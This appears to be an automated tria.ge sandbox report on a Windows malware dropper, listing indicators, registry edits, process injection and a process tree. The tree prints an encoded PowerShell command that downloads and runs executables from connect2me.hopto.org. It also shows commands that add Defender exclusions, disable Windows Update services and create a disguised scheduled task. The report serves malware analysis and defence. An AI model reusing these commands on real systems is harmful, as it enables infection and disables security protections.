Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2023, 00:40
Static task
static1
Behavioral task
behavioral1
Sample
17855519b9e1bde7cabf66a422b5671d4d462968.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
17855519b9e1bde7cabf66a422b5671d4d462968.exe
Resource
win10v2004-20221111-en
General
-
Target
17855519b9e1bde7cabf66a422b5671d4d462968.exe
-
Size
365KB
-
MD5
ee244310289c82ebe8c73cfd83329f49
-
SHA1
17855519b9e1bde7cabf66a422b5671d4d462968
-
SHA256
702c24cbf8634002b69a57efdbede5fa256b487e97f7d9272354fdae9c363d33
-
SHA512
20053cb845d1ef2845c85596f0d214b04fc8301cb783d8631ca8504af26706e78f046d691a65d1bd8fb9f15ff22e3136d5771f5a9394eb8d534afcc90f350d2b
-
SSDEEP
6144:xVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO19AjWbc:xRDF2BpjLQLsvBP0+ecyEY37CGP
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2300 created 2340 2300 SmartDefRun.exe 78 PID 2300 created 2340 2300 SmartDefRun.exe 78 PID 2300 created 2340 2300 SmartDefRun.exe 78 PID 2300 created 2340 2300 SmartDefRun.exe 78 PID 4628 created 576 4628 powershell.EXE 7 -
Blocklisted process makes network request 4 IoCs
flow pid Process 23 4740 powershell.exe 32 4740 powershell.exe 51 4740 powershell.exe 53 4740 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 2 IoCs
pid Process 4712 SysApp.exe 2300 SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klService.exe SysApp.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4972 set thread context of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4712 set thread context of 2696 4712 SysApp.exe 97 PID 2300 set thread context of 1292 2300 SmartDefRun.exe 121 PID 4628 set thread context of 2040 4628 powershell.EXE 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4956 sc.exe 4112 sc.exe 1964 sc.exe 3256 sc.exe 1920 sc.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3248 4972 WerFault.exe 82 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2064 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 4740 powershell.exe 4740 powershell.exe 2300 SmartDefRun.exe 2300 SmartDefRun.exe 3028 powershell.exe 3028 powershell.exe 2300 SmartDefRun.exe 2300 SmartDefRun.exe 2300 SmartDefRun.exe 2300 SmartDefRun.exe 2984 powershell.exe 2984 powershell.exe 2300 SmartDefRun.exe 2300 SmartDefRun.exe 4628 powershell.EXE 4628 powershell.EXE 3252 powershell.EXE 3252 powershell.EXE 4628 powershell.EXE 2040 dllhost.exe 2040 dllhost.exe 2040 dllhost.exe 2040 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4740 powershell.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 2984 powershell.exe Token: SeSecurityPrivilege 2984 powershell.exe Token: SeTakeOwnershipPrivilege 2984 powershell.exe Token: SeLoadDriverPrivilege 2984 powershell.exe Token: SeSystemProfilePrivilege 2984 powershell.exe Token: SeSystemtimePrivilege 2984 powershell.exe Token: SeProfSingleProcessPrivilege 2984 powershell.exe Token: SeIncBasePriorityPrivilege 2984 powershell.exe Token: SeCreatePagefilePrivilege 2984 powershell.exe Token: SeBackupPrivilege 2984 powershell.exe Token: SeRestorePrivilege 2984 powershell.exe Token: SeShutdownPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeSystemEnvironmentPrivilege 2984 powershell.exe Token: SeRemoteShutdownPrivilege 2984 powershell.exe Token: SeUndockPrivilege 2984 powershell.exe Token: SeManageVolumePrivilege 2984 powershell.exe Token: 33 2984 powershell.exe Token: 34 2984 powershell.exe Token: 35 2984 powershell.exe Token: 36 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 2984 powershell.exe Token: SeSecurityPrivilege 2984 powershell.exe Token: SeTakeOwnershipPrivilege 2984 powershell.exe Token: SeLoadDriverPrivilege 2984 powershell.exe Token: SeSystemProfilePrivilege 2984 powershell.exe Token: SeSystemtimePrivilege 2984 powershell.exe Token: SeProfSingleProcessPrivilege 2984 powershell.exe Token: SeIncBasePriorityPrivilege 2984 powershell.exe Token: SeCreatePagefilePrivilege 2984 powershell.exe Token: SeBackupPrivilege 2984 powershell.exe Token: SeRestorePrivilege 2984 powershell.exe Token: SeShutdownPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeSystemEnvironmentPrivilege 2984 powershell.exe Token: SeRemoteShutdownPrivilege 2984 powershell.exe Token: SeUndockPrivilege 2984 powershell.exe Token: SeManageVolumePrivilege 2984 powershell.exe Token: 33 2984 powershell.exe Token: 34 2984 powershell.exe Token: 35 2984 powershell.exe Token: 36 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 2984 powershell.exe Token: SeSecurityPrivilege 2984 powershell.exe Token: SeTakeOwnershipPrivilege 2984 powershell.exe Token: SeLoadDriverPrivilege 2984 powershell.exe Token: SeSystemProfilePrivilege 2984 powershell.exe Token: SeSystemtimePrivilege 2984 powershell.exe Token: SeProfSingleProcessPrivilege 2984 powershell.exe Token: SeIncBasePriorityPrivilege 2984 powershell.exe Token: SeCreatePagefilePrivilege 2984 powershell.exe Token: SeBackupPrivilege 2984 powershell.exe Token: SeRestorePrivilege 2984 powershell.exe Token: SeShutdownPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeSystemEnvironmentPrivilege 2984 powershell.exe Token: SeRemoteShutdownPrivilege 2984 powershell.exe Token: SeUndockPrivilege 2984 powershell.exe Token: SeManageVolumePrivilege 2984 powershell.exe Token: 33 2984 powershell.exe Token: 34 2984 powershell.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 4972 wrote to memory of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4972 wrote to memory of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4972 wrote to memory of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4972 wrote to memory of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4972 wrote to memory of 4188 4972 17855519b9e1bde7cabf66a422b5671d4d462968.exe 84 PID 4188 wrote to memory of 4740 4188 vbc.exe 88 PID 4188 wrote to memory of 4740 4188 vbc.exe 88 PID 4188 wrote to memory of 4740 4188 vbc.exe 88 PID 4740 wrote to memory of 4712 4740 powershell.exe 94 PID 4740 wrote to memory of 4712 4740 powershell.exe 94 PID 4740 wrote to memory of 4712 4740 powershell.exe 94 PID 4740 wrote to memory of 2300 4740 powershell.exe 96 PID 4740 wrote to memory of 2300 4740 powershell.exe 96 PID 4712 wrote to memory of 2696 4712 SysApp.exe 97 PID 4712 wrote to memory of 2696 4712 SysApp.exe 97 PID 4712 wrote to memory of 2696 4712 SysApp.exe 97 PID 4712 wrote to memory of 2696 4712 SysApp.exe 97 PID 4712 wrote to memory of 2696 4712 SysApp.exe 97 PID 2696 wrote to memory of 2064 2696 vbc.exe 98 PID 2696 wrote to memory of 2064 2696 vbc.exe 98 PID 2696 wrote to memory of 2064 2696 vbc.exe 98 PID 5020 wrote to memory of 4956 5020 cmd.exe 109 PID 5020 wrote to memory of 4956 5020 cmd.exe 109 PID 5020 wrote to memory of 4112 5020 cmd.exe 110 PID 5020 wrote to memory of 4112 5020 cmd.exe 110 PID 5020 wrote to memory of 1964 5020 cmd.exe 111 PID 5020 wrote to memory of 1964 5020 cmd.exe 111 PID 5020 wrote to memory of 3256 5020 cmd.exe 112 PID 5020 wrote to memory of 3256 5020 cmd.exe 112 PID 5020 wrote to memory of 1920 5020 cmd.exe 113 PID 5020 wrote to memory of 1920 5020 cmd.exe 113 PID 5020 wrote to memory of 4828 5020 cmd.exe 114 PID 5020 wrote to memory of 4828 5020 cmd.exe 114 PID 5020 wrote to memory of 2636 5020 cmd.exe 116 PID 5020 wrote to memory of 2636 5020 cmd.exe 116 PID 5020 wrote to memory of 3200 5020 cmd.exe 117 PID 5020 wrote to memory of 3200 5020 cmd.exe 117 PID 5020 wrote to memory of 4760 5020 cmd.exe 118 PID 5020 wrote to memory of 4760 5020 cmd.exe 118 PID 5020 wrote to memory of 2180 5020 cmd.exe 119 PID 5020 wrote to memory of 2180 5020 cmd.exe 119 PID 2300 wrote to memory of 1292 2300 SmartDefRun.exe 121 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 4628 wrote to memory of 2040 4628 powershell.EXE 126 PID 2040 wrote to memory of 576 2040 dllhost.exe 7 PID 2040 wrote to memory of 660 2040 dllhost.exe 6 PID 2040 wrote to memory of 944 2040 dllhost.exe 14 PID 2040 wrote to memory of 1012 2040 dllhost.exe 10
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:660
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:576
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1012
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{15b1f8f6-2ff2-46cc-907a-519bf3c9e19b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"7⤵
- Creates scheduled task(s)
PID:2064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2300
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 3123⤵
- Program crash
PID:3248
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4112
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4828
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2636
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3200
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4760
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2180
-
-
-
